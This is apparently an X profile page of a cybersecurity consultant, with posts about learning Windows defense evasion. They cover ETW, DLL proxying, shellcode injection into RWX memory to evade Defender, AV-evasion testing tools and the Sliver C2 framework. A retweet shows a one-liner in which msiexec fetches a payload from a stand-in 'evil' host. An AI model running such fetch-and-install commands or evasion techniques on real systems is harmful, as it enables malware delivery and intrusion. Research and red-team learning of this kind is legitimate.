8erg_ Profile Banner
8erg Profile
8erg

@8erg_

Followers
34
Following
1K
Media
6
Statuses
504

πŸ§ͺ | In The Lab πŸ§‘β€πŸ’» | Cybersecurity Consultant πŸ₯Š | Debugging Life, One Round at a Time

Joined April 2024
Don't wanna be here? Send us removal request.
@8erg_
8erg
11 days
I've been diving a little bit more into defense evasion and one thing I'm learning right now is ETW and one tool that provides insight on all the providers used by it, is ETWExplorer by Pavel Yosifovich aka @zodiacon . I know, I'm late. very late.
Tweet card summary image
github.com
View ETW Provider manifest. Contribute to zodiacon/EtwExplorer development by creating an account on GitHub.
0
13
78
@8erg_
8erg
13 days
RT @YourFinalSin: Day 144 - Bug Bounty . - Went today deep in authentication flows.- Learned a lot about different edge cases using diff….
Tweet card summary image
github.com
Top disclosed reports from HackerOne. Contribute to reddelexc/hackerone-reports development by creating an account on GitHub.
0
42
0
@8erg_
8erg
13 days
I just released a blog post about performing a DLL Proxying via OneDriveServiceUpdater.exe. Why did I chose this one. just because I wanted toπŸ€—. But you can perform this with any other executable the process is still the same . πŸ”—Link:
0
0
1
@8erg_
8erg
13 days
RT @T3chFalcon: Most people think .msi files are just installers. But red teamers know better. msiexec.exe /i http://evil[.]com/payload[.….
0
91
0
@8erg_
8erg
26 days
Who can tell me the problem here. ?🫠
Tweet media one
0
0
1
@8erg_
8erg
26 days
Every vibe coder, right now. πŸ™€. The zero-day that could've compromised every Cursor and Windsurf user. (Side note) But even editors like VS Code are prone to having malicious extensions too.
Tweet card summary image
bleepingcomputer.com
Learn how one overlooked flaw in OpenVSX discovered by Koi Secureity could've let attackers hijack millions of dev machines via an extension supply chain attack. The zero-day threat's been patchedβ€”...
0
0
1
@8erg_
8erg
29 days
I would say hands down that reverse engineering, it's the most important skill, in cybersecurity or any other fields (try to change my mind).
0
0
0
@8erg_
8erg
1 month
I don't think this type of technique is really optimal, while it bypass windows, it can make some program crash. (Open for discussion). I'm thinking of trying another simple way.
0
0
0
@8erg_
8erg
1 month
6/6 So by that i'm deducing that the memory we're overwritting might be a critical component of the process which makes it crash.
0
0
0
@8erg_
8erg
1 month
5/6 So i tried to make my program skip it and find another process, but immediately after injecting into it, it crashed.
1
0
0
@8erg_
8erg
1 month
4/6 But then I was like oh wait, maybe, it's because it gets injected into SearchApp, which pause itself when it's not used, but i can clearly see the shellcode that was written
Tweet media one
1
0
0
@8erg_
8erg
1 month
3/6 But the process where my shellcode gets injected keeps crashing.
1
0
0
@8erg_
8erg
1 month
2/6 The executable is not being detect by the av (Ive used a xor and im using an uncommon sequence).
1
0
0
@8erg_
8erg
1 month
1/6 I've been trying a defense evasion for windows defender by enumerating RWX Protected memory regions for code injection. But have been facing a problem.
2
0
2
@8erg_
8erg
1 month
who's going to defcon this year?.
0
0
0
@8erg_
8erg
1 month
Here are some tools that I've discovered recently to test/verify AV evasion without burning my signatures: . πŸ”—πŸ”—πŸ”— . P-S : Qu1cksc0pe, is my favorite for now🀩
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
2
6
@8erg_
8erg
1 month
Tweet 5/6.πŸ‘‰ Sliver uses msfvenom (linked to Metasploit) for shellcode generation (I didn't really divorce, keeping my options open. πŸ˜‚) .πŸ‘‰ By default, implants will be detected by AV - disable Windows Defender for testing .πŸ‘‰ Requires MSF 6.2+.
0
0
1
@8erg_
8erg
1 month
Tweet 4/6 Key features for those who want the specs: βœ… Multi-platform support (Windows, Linux, macOS) βœ… Multiple transports (HTTP, HTTPS, mTLS, DNS, WireGuard) .βœ… Feature extensions via "Armory" .βœ… Much more (honestly, I haven't finished experimenting myself πŸ˜‚).
0
0
1